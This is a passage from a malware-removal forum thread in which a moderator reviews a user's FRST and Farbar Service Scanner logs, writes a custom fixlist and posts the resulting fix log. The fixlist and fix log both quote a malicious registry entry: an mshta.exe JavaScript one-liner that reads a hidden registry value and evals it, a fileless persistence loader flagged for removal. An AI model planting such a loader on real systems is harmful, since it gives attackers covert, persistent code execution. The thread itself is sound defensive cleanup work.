(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Microsoft Corporation) C:\Windows\ehome\ehmsas.exe
(Synaptics, Inc.) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [TPwrMain] => C:\Program Files\TOSHIBA\Power Saver\TPwrMain.EXE [431968 2008-02-06] (TOSHIBA Corporation)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [1573160 2008-08-14] (Synaptics, Inc.)
HKLM\...\Run: [SmoothView] => C:\Program Files\Toshiba\SmoothView\SmoothView.exe [518008 2008-06-02] (TOSHIBA Corporation)
HKLM\...\Run: [Skytel] => C:\Windows\Skytel.exe [1826816 2007-11-20] (Realtek Semiconductor Corp.)
HKLM\...\Run: [RtHDVCpl] => C:\Windows\RAVCpl64.exe [6156288 2008-04-08] (Realtek Semiconductor)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [1354712 2016-08-30] (Microsoft Corporation)
HKLM\...\Run: [HSON] => C:\Program Files\TOSHIBA\TBS\HSON.exe [52560 2007-12-06] (TOSHIBA Corporation)
HKLM\...\Run: [00TCrdMain] => C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe [865280 2008-05-09] (TOSHIBA Corporation)
HKLM-x32\...\Run: [NDSTray.exe] => NDSTray.exe
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2016-09-22] (Oracle Corporation)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-1782139309-2775357304-4162436881-1000\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [138240 2008-01-20] (Microsoft Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Office.lnk [2015-05-10]
ShortcutTarget: Microsoft Office.lnk -> C:\Program Files (x86)\Microsoft Office\Office\OSA9.EXE (Microsoft Corporation)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 75.75.75.75 75.75.76.76
Tcpip\..\Interfaces\{C12D3495-9B83-4917-A534-5FCF1ED20B86}: [DhcpNameServer] 75.75.75.75 75.75.76.76

Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-1782139309-2775357304-4162436881-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.toshibadirect.com/dpdstart
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\S-1-5-21-1782139309-2775357304-4162436881-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-1782139309-2775357304-4162436881-1000\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
SearchScopes: HKLM -> {433BB3A7-874E-436B-BD51-239C6921FE98} URL = hxxp://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}&ie={inputEncoding}&oe={outputEncoding}&startIndex={startIndex?}&startPage={startPage};
SearchScopes: HKLM-x32 -> {7CC94BCA-8E5E-4FAD-ACE5-798C208642BC} URL = hxxp://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}&ie={inputEncoding}&oe={outputEncoding}&startIndex={startIndex?}&startPage={startPage}
SearchScopes: HKU\S-1-5-21-1782139309-2775357304-4162436881-1000 -> {56B663A7-8091-4EF3-A706-11C321B76ABB} URL = hxxps://search.yahoo.com/search?p={searchTerms}&fr=yset_ie_syc_oracle&type=orcl_default
SearchScopes: HKU\S-1-5-21-1782139309-2775357304-4162436881-1000 -> {7CC94BCA-8E5E-4FAD-ACE5-798C208642BC} URL = hxxp://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}&ie={inputEncoding}&oe={outputEncoding}&startIndex={startIndex?}&startPage={startPage}
BHO-x32: Ghostery Plugin -> {6BF739DD-3323-4C6A-975B-C7E00A50B154} -> C:\Program Files (x86)\Ghostery\bin\ghostery.dll [2015-10-30] (Ghostery, Inc.)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\ssv.dll [2016-10-19] (Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\jp2ssv.dll [2016-10-19] (Oracle Corporation)
Handler-x32: http - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-12-02] (Microsoft Corporation)
Handler-x32: http - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-12-02] (Microsoft Corporation)
Handler-x32: https - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-12-02] (Microsoft Corporation)
Handler-x32: https - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-12-02] (Microsoft Corporation)
Handler-x32: ipp - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-12-02] (Microsoft Corporation)
Handler-x32: msdaipp - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-12-02] (Microsoft Corporation)
Handler-x32: msdaipp - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-12-02] (Microsoft Corporation)

FireFox:
========
FF ProfilePath: C:\Users\Me\AppData\Roaming\Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897 [2016-12-22]
FF DefaultSearchEngine.US: Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897 -> Bing
FF Homepage: Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897 -> about:home
FF NetworkProxy: Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897 -> type", 0
FF Extension: (Adblock Plus Pop-up Addon) - C:\Users\Me\AppData\Roaming\Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897\Extensions\[email protected] [2016-04-27]
FF Extension: (Ghostery) - C:\Users\Me\AppData\Roaming\Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897\Extensions\[email protected] [2016-11-29]
FF Extension: (Facebook™ Disconnect) - C:\Users\Me\AppData\Roaming\Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897\Extensions\[email protected] [2016-09-06]
FF Extension: (Flagfox) - C:\Users\Me\AppData\Roaming\Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897\Extensions\{1018e4d6-728f-4b20-ad56-37578a4de76b}.xpi [2016-12-16]
FF Extension: (NoScript) - C:\Users\Me\AppData\Roaming\Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897\Extensions\{73a6fe31-595d-460b-a920-fcc0f8843232}.xpi [2016-11-29]
FF Extension: (Adblock Plus) - C:\Users\Me\AppData\Roaming\Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2016-11-23]
FF Extension: (BetterPrivacy) - C:\Users\Me\AppData\Roaming\Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897\Extensions\{d40f5e7b-d2cf-4856-b441-cc613eeffbe3}.xpi [2016-10-31]
FF SearchPlugin: C:\Users\Me\AppData\Roaming\Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897\searchplugins\yahoo-ysp.xml [2015-11-23]
FF ProfilePath: C:\Users\Me\AppData\Roaming\kompozer.net\KompoZer\Profiles\rx44r1ux.default [2015-05-27]
FF HKLM-x32\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: (Microsoft .NET Framework Assistant) - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2015-05-10] [not signed]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_24_0_0_186.dll [2016-12-13] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_24_0_0_186.dll [2016-12-13] ()
FF Plugin-x32: @java.com/DTPlugin,version=11.111.2 -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\dtplugin\npDeployJava1.dll [2016-10-19] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.111.2 -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\plugin2\npjp2.dll [2016-10-19] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll [2008-07-29] (Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll [2015-09-24] (Adobe Systems Inc.)

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S4 ConfigFree Gadget Service; C:\Program Files (x86)\TOSHIBA\ConfigFree\CFProcSRVC.exe [36864 2008-04-03] (TOSHIBA Corporation.) [File not signed]
S4 ConfigFree Service; C:\Program Files (x86)\TOSHIBA\ConfigFree\CFSvcs.exe [40960 2008-04-16] (TOSHIBA CORPORATION) [File not signed]
S4 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe [69632 2005-11-14] (Macrovision Corporation) [File not signed]
S4 jswpsapi; C:\Program Files (x86)\Jumpstart\jswpsapi.exe [954368 2008-04-16] (Atheros Communications, Inc.) [File not signed]
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [120888 2016-08-30] (Microsoft Corporation)
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2010-08-06] (Hewlett-Packard) [File not signed]
R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [361816 2016-08-30] (Microsoft Corporation)
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2010-08-06] (Hewlett-Packard) [File not signed]
S4 ReflectService.exe; C:\Program Files\Macrium\Reflect\ReflectService.exe [3272656 2014-07-21] (Paramount Software UK Ltd)
S4 SmartFaceVWatchSrv; C:\Program Files\TOSHIBA\SmartFaceV\SmartFaceVWatchSrv.exe [84992 2008-04-24] (Toshiba) [File not signed]
S4 TNaviSrv; C:\Program Files (x86)\Toshiba\TOSHIBA DVD PLAYER\TNaviSrv.exe [83312 2008-07-18] (TOSHIBA Corporation)
S4 TODDSrv; C:\Windows\system32\TODDSrv.exe [135168 2007-11-21] (TOSHIBA Corporation) [File not signed]
S4 TOSHIBA SMART Log Service; C:\Program Files\TOSHIBA\SMARTLogService\TosIPCSrv.exe [175104 2007-12-03] (TOSHIBA Corporation) [File not signed]
S4 UleadBurningHelper; C:\Program Files (x86)\Common Files\Ulead Systems\DVD\ULCDRSvr.exe [49152 2006-08-23] (Ulead Systems, Inc.) [File not signed]
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [383544 2008-01-20] (Microsoft Corporation)
S3 hpqcxs08; C:\Program Files (x86)\HP\Digital Imaging\bin\hpqcxs08.dll [X]
S4 IAANTMON; C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\IAANTMon.exe [X]

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

U5 AppMgmt; C:\Windows\system32\svchost.exe [27648 2008-01-20] (Microsoft Corporation)
S1 Beep; no ImagePath
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [295000 2016-08-25] (Microsoft Corporation)
R3 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [135928 2016-08-25] (Microsoft Corporation)
S3 PSMounterEx; C:\Windows\system32\drivers\psmounterex.sys [169992 2015-04-02] (Windows (R) Win 7 DDK provider)
S3 PSVolAcc; C:\Windows\System32\Drivers\PSVolAcc.sys [12760 2014-07-21] (Paramount Software UK Ltd)
S3 WIMMount; C:\Program Files\Macrium\Reflect\wimmount.sys [22096 2015-05-14] (Microsoft Corporation)
S0 iaStor; system32\DRIVERS\iaStor.sys [X]
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-12-22 15:02 - 2016-12-22 15:02 - 00000000 ____D C:\FRST
2016-12-22 11:41 - 2016-12-22 15:02 - 00000000 ____D C:\Users\Me\Desktop\stuff
2016-12-22 08:00 - 2016-12-22 08:00 - 00006778 _____ C:\ComboFix.txt
2016-12-22 07:46 - 2016-12-22 08:00 - 00000000 ____D C:\Qoobox
2016-12-22 07:46 - 2011-06-25 22:45 - 00256000 _____ C:\Windows\PEV.exe
2016-12-22 07:46 - 2010-11-07 09:20 - 00208896 _____ C:\Windows\MBR.exe
2016-12-22 07:46 - 2009-04-19 20:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2016-12-22 07:46 - 2000-08-30 16:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2016-12-22 07:46 - 2000-08-30 16:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2016-12-22 07:46 - 2000-08-30 16:00 - 00098816 _____ C:\Windows\sed.exe
2016-12-22 07:46 - 2000-08-30 16:00 - 00080412 _____ C:\Windows\grep.exe
2016-12-22 07:46 - 2000-08-30 16:00 - 00068096 _____ C:\Windows\zip.exe
2016-12-22 07:45 - 2016-12-22 07:58 - 00000000 ____D C:\Windows\erdnt
2016-12-22 07:25 - 2016-12-22 07:25 - 05659917 ____R (Swearware) C:\Users\Me\Desktop\ComboFix.exe
2016-12-20 11:30 - 2016-12-20 11:48 - 00000000 ____D C:\Users\Me\Desktop\house pics
2016-12-18 15:52 - 2016-12-18 15:52 - 00000000 ____D C:\Windows\CheckSur
2016-12-18 12:16 - 2016-12-18 12:16 - 00000000 ____D C:\65c7b20dc424bda6bd39db516b4d
2016-12-18 09:45 - 2016-12-18 09:45 - 00000000 ____D C:\2b654b41d190c0d9a397eb33
2016-11-24 14:24 - 2016-10-25 15:10 - 02804736 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2016-11-24 14:19 - 2016-11-02 08:16 - 00383208 _____ (Adobe Systems Incorporated) C:\Windows\system32\atmfd.dll
2016-11-24 14:19 - 2016-11-02 08:09 - 00048128 _____ (Adobe Systems) C:\Windows\system32\atmlib.dll
2016-11-24 14:19 - 2016-11-02 08:06 - 00306408 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\atmfd.dll
2016-11-24 14:19 - 2016-11-02 07:59 - 00034304 _____ (Adobe Systems) C:\Windows\SysWOW64\atmlib.dll
2016-11-24 14:05 - 2016-11-24 14:05 - 00000000 ____D C:\03a9f024af5b29727cd1e2a8
2016-11-24 13:37 - 2016-10-04 06:41 - 00090112 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\bowser.sys

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-12-22 14:59 - 2016-11-18 12:30 - 00000000 ____D C:\Users\Me\AppData\LocalLow\Mozilla
2016-12-22 14:12 - 2006-11-02 05:33 - 00000000 ____D C:\Windows\inf
2016-12-22 14:04 - 2016-05-06 12:01 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2016-12-22 13:43 - 2006-11-02 07:22 - 00003616 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2016-12-22 13:43 - 2006-11-02 07:22 - 00003616 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2016-12-22 11:48 - 2006-11-02 04:46 - 00758370 _____ C:\Windows\system32\PerfStringBackup.INI
2016-12-22 11:43 - 2006-11-02 07:42 - 00032568 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2016-12-22 11:43 - 2006-11-02 07:42 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-12-22 11:43 - 2006-11-02 07:21 - 00409496 _____ C:\Windows\system32\FNTCACHE.DAT
2016-12-22 07:58 - 2006-11-02 04:34 - 00000215 _____ C:\Windows\system.ini
2016-12-22 07:37 - 2015-07-09 06:57 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2016-12-22 07:30 - 2015-07-07 06:28 - 00000000 ____D C:\AdwCleaner
2016-12-17 14:47 - 2015-05-10 06:56 - 00000000 ____D C:\Users\Me\AppData\Roaming\Macromedia
2016-12-17 10:26 - 2016-06-17 13:37 - 06858912 _____ (ESET spol. s r.o.) C:\Users\Me\Desktop\esetonlinescanner_enu.exe
2016-12-14 07:15 - 2015-05-10 07:22 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-12-13 11:04 - 2016-05-06 12:01 - 00802904 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2016-12-13 11:04 - 2016-05-06 12:01 - 00144472 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2016-12-13 11:04 - 2016-05-06 12:01 - 00003682 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2016-12-13 11:04 - 2015-05-10 10:30 - 00000000 ____D C:\Windows\system32\Macromed
2016-12-13 11:04 - 2008-08-18 10:23 - 00000000 ____D C:\Windows\SysWOW64\Macromed
2016-12-13 08:32 - 2015-05-14 14:58 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-12-11 08:07 - 2015-07-10 09:12 - 00000000 ____D C:\Users\Me\AppData\LocalLow\Ghostery
2016-12-04 14:20 - 2015-05-10 06:56 - 00000000 ____D C:\Users\Me\AppData\Roaming\Intelli-studio
2016-11-23 19:29 - 2016-11-21 18:37 - 00025088 ____H C:\Users\Me\Desktop\~WRL3107.tmp

==================== Files in the root of some directories =======

2015-05-10 07:00 - 2012-03-25 08:43 - 0000680 _____ () C:\Users\Me\AppData\Local\d3d9caps.dat
2015-05-10 07:00 - 2016-09-10 13:49 - 0001460 _____ () C:\Users\Me\AppData\Local\d3d9caps64.dat
2015-05-10 07:00 - 2016-03-31 07:42 - 0010240 _____ () C:\Users\Me\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2015-05-10 07:00 - 2013-03-18 16:21 - 0386444 _____ () C:\Users\Me\AppData\Local\dd_vcredistMSI25C2.txt
2015-05-10 07:00 - 2013-03-18 16:21 - 0011374 _____ () C:\Users\Me\AppData\Local\dd_vcredistUI25C2.txt
2015-06-09 07:44 - 2016-11-23 09:56 - 0020468 _____ () C:\ProgramData\hpzinstall.log
2015-05-10 05:55 - 2015-05-10 05:55 - 0005115 _____ () C:\ProgramData\N360BUOptions.ini

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2016-12-22 11:51

==================== End of FRST.txt ============================
Attached Files
File Type: txt Addition.txt (27.6 KB, 12 views)
win98forever is offline  
Old 12-22-2016, 09:27 PM   #9
Security Team
Moderator, Analyst
Rangemaster, TSF Academy
 
chemist's Avatar

Microsoft Most Valuable Professional
 
Join Date: Oct 2007
Location: Georgia
Posts: 29,790
OS: XP/Win7/Win10



Hello again, win98forever.

------------------------------------------------------

Please download Farbar Service Scanner and run it on the computer with the issue.
  • Make sure the Internet Services option remains checked.
  • Check all the other boxes.
  • Click Scan.
  • It will create a log (FSS.txt) in the same directory the tool is run.
  • Please copy and paste the log in your next reply.
------------------------------------------------------
__________________
Our services are free, but you may contribute to the author of ComboFix via PayPal

Proud member of UNITE

Microsoft MVP - Consumer Security 2014, 2015
chemist is offline  
Old 12-23-2016, 08:28 AM   #10
TSF Enthusiast
 
Join Date: Jul 2009
Posts: 687
OS: vista home premium, Windows 10



Good morning Chemist,

Farbar Service Scanner Version: 27-01-2016
Ran by Me (administrator) on 23-12-2016 at 08:25:30
Running from "C:\Users\Me\Desktop"
Microsoft® Windows Vista™ Home Premium Service Pack 2 (X64)
Boot Mode: Normal
****************************************************************

Internet Services:
============

Connection Status:
==============
Localhost is accessible.
LAN connected.
Google IP is accessible.
Google.com is accessible.
Yahoo.com is accessible.


Windows Firewall:
=============

Firewall Disabled Policy:
==================


System Restore:
============

System Restore Policy:
========================


Security Center:
============


Windows Update:
============

Windows Autoupdate Disabled Policy:
============================


Windows Defender:
==============
WinDefend Service is not running. Checking service configuration:
The start type of WinDefend service is set to Demand. The default start type is Auto.
The ImagePath of WinDefend service is OK.
The ServiceDll of WinDefend service is OK.


Windows Defender Disabled Policy:
==========================
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender]
"DisableAntiSpyware"=DWORD:1


Other Services:
==============


File Check:
========
C:\Windows\System32\nsisvc.dll => File is digitally signed
C:\Windows\System32\drivers\nsiproxy.sys => File is digitally signed
C:\Windows\System32\dhcpcsvc.dll => File is digitally signed
C:\Windows\System32\drivers\afd.sys => File is digitally signed
C:\Windows\System32\drivers\tdx.sys => File is digitally signed
C:\Windows\System32\Drivers\tcpip.sys => File is digitally signed
C:\Windows\System32\dnsrslvr.dll => File is digitally signed
C:\Windows\System32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\System32\mpssvc.dll => File is digitally signed
C:\Windows\System32\bfe.dll => File is digitally signed
C:\Windows\System32\drivers\mpsdrv.sys => File is digitally signed
C:\Windows\System32\SDRSVC.dll => File is digitally signed
C:\Windows\System32\vssvc.exe => File is digitally signed
C:\Windows\System32\wscsvc.dll => File is digitally signed
C:\Windows\System32\wbem\WMIsvc.dll => File is digitally signed
C:\Windows\System32\wuaueng.dll => File is digitally signed
C:\Windows\System32\qmgr.dll => File is digitally signed
C:\Windows\System32\es.dll => File is digitally signed
C:\Windows\System32\cryptsvc.dll => File is digitally signed
C:\Program Files\Windows Defender\MpSvc.dll => File is digitally signed
C:\Windows\System32\ipnathlp.dll => File is digitally signed
C:\Windows\System32\iphlpsvc.dll => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed


**** End of log ****
win98forever is offline  
Old 12-24-2016, 12:09 PM   #11
Security Team
Moderator, Analyst
Rangemaster, TSF Academy
 
chemist's Avatar

Microsoft Most Valuable Professional
 
Join Date: Oct 2007
Location: Georgia
Posts: 29,790
OS: XP/Win7/Win10



Hello again, win98forever. Are you currently experiencing any problems with your machine?

------------------------------------------------------
  • Open Notepad (Start > All Programs > Accessories > Notepad).
  • Please copy all the text in the codebox below. (To do this highlight the contents of the box, right-click on it and select Copy. Right-click in the open Notepad and select Paste).
  • Save it as fixlist.txt next to FRST64.exe

    NOTE: Both FRST64.exe and the fixlist.txt must be in the same location or the fix will not work.


    Code:
    start
    createrestorepoint:
    Task: {1FF86DA0-1AF2-4032-88A4-F8882C4552AB} - \DriverDocRunAtStartup -> No File <==== ATTENTION
    Task: {597B495C-7D2A-4C09-9473-E34D0C324223} - \DriverDoc_UPDATES -> No File <==== ATTENTION
    HKU\S-1-5-21-1782139309-2775357304-4162436881-1000\Software\Classes\13cb9: "C:\Windows\system32\mshta.exe" "javascript:e0ldi7ba="7Q";E0B1=new ActiveXObject("WScript.Shell");FZc9QGI6="JoO3na";AqP8o3=E0B1.RegRead("HKCU\\software\\lgduy\\ulqvtwy");WB97YbhTf="08QxfG";eval(AqP8o3);AOM8kr="h06uuXT";" <===== ATTENTION
    HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
    HKU\S-1-5-21-1782139309-2775357304-4162436881-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
    EmptyTemp:
    end
  • Double-click FRST64 to run the tool. If the tool warns you the version is outdated, please download and run the updated version.
  • Click the Fix button just once, and wait.
  • If you receive a message that a reboot is required, please make sure you allow it to restart normally.
  • The tool will complete its run after the restart.
  • When finished, the tool will make a log (Fixlog.txt) in the same location from where it was run. Please post the Fixlog.txt log in your reply.

NOTE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

------------------------------------------------------

Please download SystemLook from one of the links below and save it to your Desktop.
Download Mirror #1
Download Mirror #2
  • Double-click SystemLook_x64.exe to run it. (Vista/Win7/Win8/Win10 users, right-click > Run as administrator)
  • Copy/paste the contents of the following codebox into the main textfield:
    Code:
    :reg
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Beep /s
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\iaStor /s
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\IpInIp /s
    
    :filefind
    beep.sys
    iaStor.sys
    ipinip.sys
  • Click the Look button to start the scan.
  • Please be patient, as it may take a while.
  • When finished, a Notepad file will open with the results of the scan. Please post this log in your next reply.
Note: The log can also be found on your Desktop entitled SystemLook.txt

------------------------------------------------------
__________________
Our services are free, but you may contribute to the author of ComboFix via PayPal

Proud member of UNITE

Microsoft MVP - Consumer Security 2014, 2015
chemist is offline  
Old 12-24-2016, 12:26 PM   #12
TSF Enthusiast
 
Join Date: Jul 2009
Posts: 687
OS: vista home premium, Windows 10



The system had been slow and while I waited I inquired what new OS I might upgrade to in another thread. Turns out 2gig of my RAM wasn't working. Fixed that by removing them and placing them back in the opposite slots. I figure one came loose. Otherwise the machine is running good. Faster now than it has been :)


Fix result of Farbar Recovery Scan Tool (x64) Version: 21-12-2016
Ran by Me (24-12-2016 12:18:46) Run:1
Running from C:\Users\Me\Desktop\fix
Loaded Profiles: Me (Available Profiles: Me)
Boot Mode: Normal
==============================================

fixlist content:
*****************
start
createrestorepoint:
Task: {1FF86DA0-1AF2-4032-88A4-F8882C4552AB} - \DriverDocRunAtStartup -> No File <==== ATTENTION
Task: {597B495C-7D2A-4C09-9473-E34D0C324223} - \DriverDoc_UPDATES -> No File <==== ATTENTION
HKU\S-1-5-21-1782139309-2775357304-4162436881-1000\Software\Classes\13cb9: "C:\Windows\system32\mshta.exe" "javascript:e0ldi7ba="7Q";E0B1=new ActiveXObject("WScript.Shell");FZc9QGI6="JoO3na";AqP8o3=E0B1.RegRead("HKCU\\software\\lgduy\\ulqvtwy");WB97YbhTf="08QxfG";eval(AqP8o3);AOM8kr="h06uuXT";" <===== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-1782139309-2775357304-4162436881-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
EmptyTemp:
end
*****************

Restore point was successfully created.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{1FF86DA0-1AF2-4032-88A4-F8882C4552AB}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1FF86DA0-1AF2-4032-88A4-F8882C4552AB}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\DriverDocRunAtStartup => key not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{597B495C-7D2A-4C09-9473-E34D0C324223}" => key removed successfully
